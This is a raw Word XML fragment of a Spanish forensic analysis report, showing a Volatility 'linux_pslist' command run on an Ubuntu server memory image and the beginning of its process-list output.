    <w:p w14:paraId="1D572EF4" w14:textId="148106FA" w:rsidR="00182D42" w:rsidRPr="00C9562B" w:rsidRDefault="00182D42" w:rsidP="00182D42">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="193" w:name="_Ref155719740"/>
      <w:bookmarkStart w:id="194" w:name="_Toc155782539"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>XV. Comando linux_pslist.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="193"/>
      <w:bookmarkEnd w:id="194"/>
    </w:p>
    <w:p w14:paraId="07498360" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="3D76C97A" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00C9562B" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111C2118" w14:textId="76A27CE3" w:rsidR="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001225E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM.mem' linux_pslist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2E4C0A" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00C9562B" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E280FEC" w14:textId="77777777" w:rsidR="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9"/>
    <w:p w14:paraId="51F7A6FA" w14:textId="77777777" w:rsidR="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:r w:rsidRPr="006A2A95">
        <w:t>La respuesta de la consola es la siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CDA149" w14:textId="77777777" w:rsidR="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FB12689"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC06989"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Volatility Foundation Volatility Framework 2.6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9D84E2" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33C90B1E"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Offset             Name                 Pid             PPid            Uid             Gid    DTB                Start Time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FFC352" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42BC478E"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 -------------------- --------------- --------------- --------------- ------ ------------------ ----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF4E5DF" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C11DB44"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0xffff90057df50000 systemd              1               0               0               0      0x000000003b7ba000 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2387FC" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6415A0E2"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0xffff90057df55b00 kthreadd             2               0               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47249EA5" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CC9EE7F"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0xffff90057df52d80 kworker/0:0H         4               2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E70072" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59CF434B"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0xffff90057df916c0 mm_percpu_wq         6               2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530913D1" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F55872F"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0xffff90057df90000 ksoftirqd/0          7               2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4A232D" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F300858"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0xffff90057df95b00 rcu_sched            8               2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D343E8E" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40BCCB98"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0xffff90057df94440 rcu_bh               9               2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785092D1" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25DB65D4"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0xffff90057df92d80 migration/0          10              2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461D55D6" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CDE4729"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0xffff90057df9db00 watchdog/0           11              2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E72BA99" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="265CE53C"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0xffff90057dff8000 cpuhp/0              12              2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426D60D7" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54D2F3A8"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lastRenderedPageBreak/>
        <w:t>0xffff90057dffdb00 kdevtmpfs            13              2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7928E940" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BDA4B19"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0xffff90057dffc440 netns                14              2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31893197" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="407FDA78"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0xffff90057dffad80 rcu_tasks_kthre      15              2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774032B6" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03ED0603"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0xffff90057dff96c0 kauditd              16              2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E66D8B" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="370C6174"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0xffff90057d49db00 xenbus               17              2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47057065" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71037A1A"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0xffff90057d49c440 xenwatch             18              2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B5B91F" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D7024EB"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0xffff90057d4996c0 khungtaskd           20              2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748B9959" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42450D62"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0xffff90057d498000 oom_reaper           21              2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A86E94A" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E1F436A"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0xffff90057d510000 writeback            22              2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B07C66" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="406A190B"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0xffff90057d515b00 kcompactd0           23              2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A11797" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="414F8540"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0xffff90057d514440 ksmd                 24              2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C12E116" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22B7C251"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0xffff90057d512d80 khugepaged           25              2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B51CBAD" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EA65DA3"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0xffff90057d5116c0 crypto               26              2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFF9F03" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F63299B"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0xffff90057d53db00 kintegrityd          27              2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588416F9" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A3FEEA9"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0xffff90057d53c440 kblockd              28              2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7222FA" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71B38A94"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0xffff90057d53ad80 ata_sff              29              2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB4A676" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD85105"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0xffff90057d5396c0 md                   30              2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C62EE4F" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78A8ED07"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lastRenderedPageBreak/>
        <w:t>0xffff90057d538000 edac-poller          31              2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5D26B0" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="039A18F0"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0xffff90057d7216c0 devfreq_wq           32              2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A20D8C" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49BB582C"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0xffff90057d720000 watchdogd            33              2               0               0      ------------------ 2018-12-21 12:04:59 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEE8502" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33327789"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0xffff90057d722d80 kswapd0              36              2               0               0      ------------------ 2018-12-21 12:05:00 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02716CB4" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32209DA9"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0xffff90057d724440 ecryptfs-kthrea      37              2               0               0      ------------------ 2018-12-21 12:05:00 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5463FA19" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="284D1C89"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0xffff900579725b00 kthrotld             79              2               0               0      ------------------ 2018-12-21 12:05:00 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7E8095" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="314C79D4"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0xffff900579724440 nvme-wq              80              2               0               0      ------------------ 2018-12-21 12:05:00 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0217830A" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DEA8D7C"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0xffff900579722d80 scsi_eh_0            81              2               0               0      ------------------ 2018-12-21 12:05:00 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0ABEDE" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A42B53A"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0xffff9005797216c0 scsi_tmf_0           82              2               0               0      ------------------ 2018-12-21 12:05:00 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4649393F" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
